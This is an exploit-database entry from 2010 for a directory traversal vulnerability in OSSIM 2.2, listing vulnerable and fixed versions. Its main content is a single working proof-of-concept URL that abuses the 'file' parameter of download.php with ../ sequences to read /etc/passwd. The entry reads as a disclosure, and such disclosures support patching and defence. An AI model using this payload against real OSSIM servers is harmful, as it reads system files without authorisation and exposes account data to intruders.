id: 11358
date: 03/18/2010
title: OSSIM (file) Parameter Directory Traversal Vulnerability
author: Nahuel Grisolia
cves: 

========================================================
OSSIM (file) Parameter Directory Traversal Vulnerability
========================================================

Vulnerable:  	 OSSIM os-sim 2.2
Not Vulnerable: 	OSSIM os-sim 2.2.1 

http://www.example.com/ossim/repository/download.php?file=../../../../../../../../etc/passwd&name=passwd.txt 



#  0day.today [2023-03-23]  #